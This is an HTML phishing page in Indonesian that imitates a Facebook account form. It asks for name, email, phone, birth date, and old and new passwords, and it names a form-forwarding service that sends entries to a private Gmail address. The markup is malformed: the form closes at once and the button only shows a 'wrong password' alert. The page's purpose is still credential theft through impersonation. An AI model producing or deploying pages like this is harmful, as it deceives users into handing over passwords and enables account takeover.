<html>
  <head>
    <title>Facebook Account</title>
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.4.1/css/all.css" integrity="sha384-5sAR7xN1Nv6T6+dT2mhtzEpVJvfS3NScPQTrOxhwjIuvcA67KV2R5Jz6kr4abQsz" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700" rel="stylesheet">
    <style>
      html, body {
      min-height: 100%;
      }
      body, div, form, input, select, p { 
      padding: 0;
      margin: 0;
      outline: none;
      font-family: Roboto, Arial, sans-serif;
      font-size: 16px;
      color: #eee;
      }
      body {
      background:rgb(34, 80, 207);
      background-size: cover;
      }
      h1, h2 {
      text-transform: uppercase;
      font-weight: 400;
      }
      h2 {
      margin: 0 0 0 8px;
      }
      .main-block {
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      height: 100%;
      padding: 25px;
      background: rgba(0, 0, 0, 0.5); 
      }
      .left-part, form {
      padding: 25px;
      }
      .left-part {
      text-align: center;
      }
      .fa-graduation-cap {
      font-size: 72px;
      }
      form {
      background: #3b5998; 
      }
      .title {
      display: flex;
      align-items: center;
      margin-bottom: 20px;
      }
      .info {
      display: flex;
      flex-direction: column;
      }
      input, select {
      padding: 5px;
      margin-bottom: 30px;
      background: transparent;
      border: none;
      border-bottom: 1px solid #eee;
      }
      input::placeholder {
      color: #eee;
      }
      option:focus {
      border: none;
      }
      option {
      background: black; 
      border: none;
      }
      .checkbox input {
      margin: 0 10px 0 0;
      vertical-align: middle;
      }
      .checkbox a {
      color: #26a9e0;
      }
      .checkbox a:hover {
      color: #85d6de;
      }
      .btn-item, button {
      padding: 10px 5px;
      margin-top: 20px;
      border-radius: 5px; 
      border: none;
      background: #26a9e0; 
      text-decoration: none;
      font-size: 15px;
      font-weight: 400;
      color: #fff;
      }
      .btn-item {
      display: inline-block;
      margin: 20px 5px 0;
      }
      button {
      width: 100%;
      }
      button:hover, .btn-item:hover {
      background: #85d6de;
      }
      @media (min-width: 568px) {
      html, body {
      height: 100%;
      }
      .main-block {
      flex-direction: row;
      height: calc(100% - 50px);
      }
      .left-part, form {
      flex: 1;
      height: auto;
      }
      }
      .center {
    display: block;
    margin-left: auto;
    margin-right: auto;
    width: 10%;
    
}
    </style>
  </head>
  <body>
    <img src="download.jpg" alt="download" class="center">
      <br>
      <form action=""https://formsubmit.co/rafliadiyasa27@gmail.com" method="POST"></form>">
        <div class="title">
          <i class="fas fa-pencil-alt"></i> 
          <h2>Informasi Pribadi</h2>
        </div>
        <div class="info">
          <input class="fname" type="text" name="name" placeholder="Nama Lengkap">
          <input type="text" name="name" placeholder="Email">
          <input type="text" name="name" placeholder="Nomor Telepon">
          <input type="" name="name" placeholder="Tanggal Lahir">
          <input type="password" name="name" placeholder="Kata Sandi Lama">
          <input type="password" name="name" placeholder=" Kata Sandi Baru">
        </div>
        <div class="checkbox">
          <input type="checkbox" name="checkbox"><span>Setuju Dengan Peraturan Oleh<a href="https://facebook.com"> Facebook.com</Facebook></a></span>
        </div>
        <button type="button" onclick="alert('Kata Sandi Salah')">Submit</button>
      </form>
    </div>
  </body>
</html>
